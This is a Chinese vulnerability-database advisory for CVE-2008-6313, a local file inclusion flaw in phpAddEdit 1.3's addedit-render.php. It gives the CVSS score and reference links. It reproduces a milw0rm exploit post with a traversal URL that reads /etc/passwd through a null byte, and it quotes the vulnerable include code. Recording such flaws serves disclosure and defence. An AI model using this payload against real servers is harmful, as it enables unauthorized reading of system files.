phpAddEdit 'addedit-render.php' 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116994 漏洞类型 路径遍历
发布时间 2008-12-10 更新时间 2009-03-18
CVE编号 CVE-2008-6313 CNNVD-ID CNNVD-200902-630
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7417
https://cxsecurity.com/issue/WLB-2009030085
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-630
|漏洞详情
phpAddEdit1.3版本的addedit-render.php中存在目录遍历漏洞,当magic_quotes_gpc被中止时,远程攻击者可以借助editform参数中的一个URL,包含和运行任意本地文件。注意:PHP远程文件包含攻击也可能发生。
|漏洞EXP
#phpaddedit-1.3 LFI


#Author: nuclear


#script:http://sourceforge.net/projects/phpaddedit/


#vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00


#vulnerable code:
if (!$formname && $_GET["editform"]) $formname = $_GET["editform"];
...
if ( $error_message || $error || !$_POST["submitval"] ) {
    include_once ($formname."-header.inc.php");
    include_once ($addeditcwd."addedit-create-form.php");
    include_once ($formname."-footer.inc.php");
}




#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r

# milw0rm.com [2008-12-10]
|参考资料

来源:XF
名称:phpaddedit-addeditrender-file-include(47262)
链接:http://xforce.iss.net/xforce/xfdb/47262
来源:BID
名称:32774
链接:http://www.securityfocus.com/bid/32774
来源:MILW0RM
名称:7417
链接:http://www.milw0rm.com/exploits/7417
来源:SECUNIA
名称:33027
链接:http://secunia.com/advisories/33027